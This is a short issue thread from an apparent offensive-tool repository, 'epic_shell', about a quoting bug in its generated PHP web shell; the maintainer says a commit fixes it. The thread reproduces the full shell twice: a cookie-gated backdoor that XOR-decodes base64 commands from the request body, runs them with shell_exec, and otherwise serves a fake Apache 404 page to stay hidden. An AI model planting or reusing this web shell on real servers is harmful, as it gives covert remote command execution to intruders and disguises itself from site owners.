### ISSUE TITLE
syntax error

### ISSUE THREAD

**Issue by Dark177y** [cwinfosec/epic_shell#4]
> $payload_key = "%s";' % gen_pkey

> need to change "%s" to '%s'

-----------------------------
127.0.0.1:58620 [500]: /shell.php - syntax error, unexpected '4' (T_LNUMBER) in /root/epic_shell/shell.php on line 2
-----------------------------

```php
<?php
$payload_key = "3"4A8@MG";     *//<----- error syntax because the double quote* 
if ($_COOKIE["session"] === "JDJiJDEyJDFNVUpibWpnTG5rS3ZJOUNXbW5Gdk9yQVUvNllOS3lYa0FqbURHYUNCS3RTcFJvekVMZmEu") {
  $payload = file_get_contents("php://input");
  $command = base64_decode($payload) ^ $payload_key;
  echo shell_exec($command);
  } else {
    http_response_code(404);
    echo "<html><head>";
    echo "<title>404 Not Found</title>";
    echo "</head><body>";
    echo "<h1>Not Found</h1>";
    echo "<p>The requested URL was not found on this server.</p>";
    echo "<hr>";
    echo "<address>Apache Server at localhost Port 80</address>";
    echo "</body></html>";
    die();
  }
?>
```

**Comment by cwinfosec** [comment]
> > $payload_key = "%s";' % gen_pkey
> 
> > need to change "%s" to '%s'
> 
> ## 127.0.0.1:58620 [500]: /shell.php - syntax error, unexpected '4' (T_LNUMBER) in /root/epic_shell/shell.php on line 2
> ```
> <?php
> $payload_key = "3"4A8@MG";     *//<----- error syntax because the double quote* 
> if ($_COOKIE["session"] === "JDJiJDEyJDFNVUpibWpnTG5rS3ZJOUNXbW5Gdk9yQVUvNllOS3lYa0FqbURHYUNCS3RTcFJvekVMZmEu") {
>   $payload = file_get_contents("php://input");
>   $command = base64_decode($payload) ^ $payload_key;
>   echo shell_exec($command);
>   } else {
>     http_response_code(404);
>     echo "<html><head>";
>     echo "<title>404 Not Found</title>";
>     echo "</head><body>";
>     echo "<h1>Not Found</h1>";
>     echo "<p>The requested URL was not found on this server.</p>";
>     echo "<hr>";
>     echo "<address>Apache Server at localhost Port 80</address>";
>     echo "</body></html>";
>     die();
>   }
> ?>
> ```

Thank you for the heads up! I will try to get this resolved as soon as I can!

**Comment by cwinfosec** [comment]
This should be resolved in commit [3a654a5](https://github.com/cwinfosec/epic_shell/commit/3a654a5d602ebf3ee6b058df303b129f4925eae0), but please let me know if you continue to have issues with this.
